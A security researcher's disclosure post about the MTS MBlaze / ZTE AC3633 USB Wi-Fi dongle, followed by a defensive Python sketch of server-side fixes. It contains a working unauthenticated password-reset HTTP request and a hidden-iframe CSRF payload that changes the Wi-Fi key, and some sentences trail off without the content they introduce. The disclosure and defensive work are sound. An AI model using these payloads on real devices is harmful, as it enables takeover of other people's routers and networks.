Multiple security issues were identified in the MTS MBlaze USB dongle. This post covers how I combined a couple of web security issues, such as authentication bypass, unauthenticated password reset, CSRF and IDOR, to develop an exploit for the MTS dongle.
Recently I bought an MTS MBlaze 3G Plus Wi-Fi USB modem. I picked it because it has pretty good tariff plans and speed compared to other providers in my area. The interesting thing is that it allows up to 5 devices to connect to it via Wi-Fi, so it appeared to me to be a fast, cheap and portable broadband alternative. This device is manufactured by ZTE, a Chinese multinational telecommunications equipment and systems company.
MBlaze has two ways of operation
After some digging, it was found that the passwords are hard-coded in the source code. The router web interface password is hard-coded in the password reset page.
The worst thing was that the session cookie used by the router web interface is static. This cookie (iusername=logined) is all you need to get an authenticated session. Because the session cookie never changes, simply setting it gives access to the protected pages of the web interface.

Another issue I found was that you can reset the router web interface password without knowing the old password. You don't even need the session cookie to reset the password. This falls under OWASP Top 10 A4, Insecure Direct Object Reference. The following request is a PoC that resets the password without knowing the old password and from an unauthenticated session.

    POST /goform/formSyWebCfg HTTP/1.1
    Host: 192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.1.1/en/password.asp
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8,es;q=0.6,ms;q=0.4
    Content-Length: 52

    action=Apply&sys_cfg=changed&sys_password=newpass

Most of the forms in the router web interface lack CSRF tokens, which makes them vulnerable to Cross-Site Request Forgery. Putting it all together, I made a quick and dirty Python PoC exploit for MTS MBlaze Ultra Wi-Fi / ZTE AC3633 that can do the following things.
The following zero-size iframe, embedded in a web page, submits a Wi-Fi configuration change to the router web interface:

    <iframe src="http://192.168.1.1/goform/formSyWebCfg?wl_encryption_protocol=3&wl_wpa_psk_mode=0&wl_wpa_psk_key=xboz&wl_auth_mode=0&oem_cfg=changed&action=Apply" width="0" height="0"></iframe>

Now the Wi-Fi key is changed to xboz. From this point, the attacker can connect to the Wi-Fi network and execute the exploit to gain access to the MTS device.
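The static cookie, the unauthenticated password reset and the missing CSRF tokens described above are all fixed on the server side. The sketch below is an added example showing one way to do that; it is not the device's firmware or the author's code. The class `WebAdmin`, the cookie name `session`, the fields `csrf_token` and `old_password`, the 8-character minimum and the sample password are assumptions; only `sys_password` and `iusername=logined` come from the page.

```python
import hashlib
import hmac
import secrets


class WebAdmin:
    """Hypothetical hardened admin backend; not ZTE firmware code."""

    def __init__(self, password):
        self._salt = secrets.token_bytes(16)
        self._pw_hash = self._hash(password)  # no plaintext password kept in pages
        self._sessions = {}                   # random session id -> CSRF token

    def _hash(self, password):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self._salt, 100_000)

    def _password_ok(self, password):
        return hmac.compare_digest(self._hash(password), self._pw_hash)

    def login(self, password):
        """Return (session_id, csrf_token) on success, None otherwise."""
        if not self._password_ok(password):
            return None
        sid, csrf = secrets.token_urlsafe(32), secrets.token_urlsafe(32)
        self._sessions[sid] = csrf
        return sid, csrf

    def change_password(self, cookies, form):
        """Return an HTTP status code for a password-change request."""
        csrf = self._sessions.get(cookies.get("session", ""))
        if csrf is None:
            return 401  # a constant cookie such as iusername=logined is not a session
        sent = form.get("csrf_token", "")
        if not hmac.compare_digest(csrf.encode(), sent.encode()):
            return 403  # form was not issued to this session (CSRF defence)
        if not self._password_ok(form.get("old_password", "")):
            return 403  # a reset must prove knowledge of the current password
        new = form.get("sys_password", "")
        if len(new) < 8:
            return 400
        self._pw_hash = self._hash(new)
        self._sessions.clear()  # force re-login everywhere after a change
        return 200


if __name__ == "__main__":
    admin = WebAdmin("constructed-default")  # constructed sample password
    form = {"action": "Apply", "sys_cfg": "changed", "sys_password": "newpass"}
    print(admin.change_password({"iusername": "logined"}, form))  # request from the page
```

Each rejected branch corresponds to one of the issues in the post: the 401 to the static cookie, the first 403 to the missing CSRF token, and the second 403 to the reset that never asked for the old password.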
Ajin Abraham is a Security Engineer with 7+ years of experience in Application Security, including 4 years of Security Research. He is passionate about developing new and unique security tools. His contributions to the hacker's arsenal include OWASP Xenotix XSS Exploit Framework, Mobile Security Framework (MobSF), Xenotix xBOT and NodeJsScan, to name a few. He has been invited to speak at multiple security conferences including ClubHack, NULLCON, OWASP AppSec Eu C&C, AsiaPac, BlackHat Europe, Hackmiami, Confidence, BlackHat US, BlackHat Asia, ToorCon, Ground Zero Summit, Hack In the Box and c0c0n.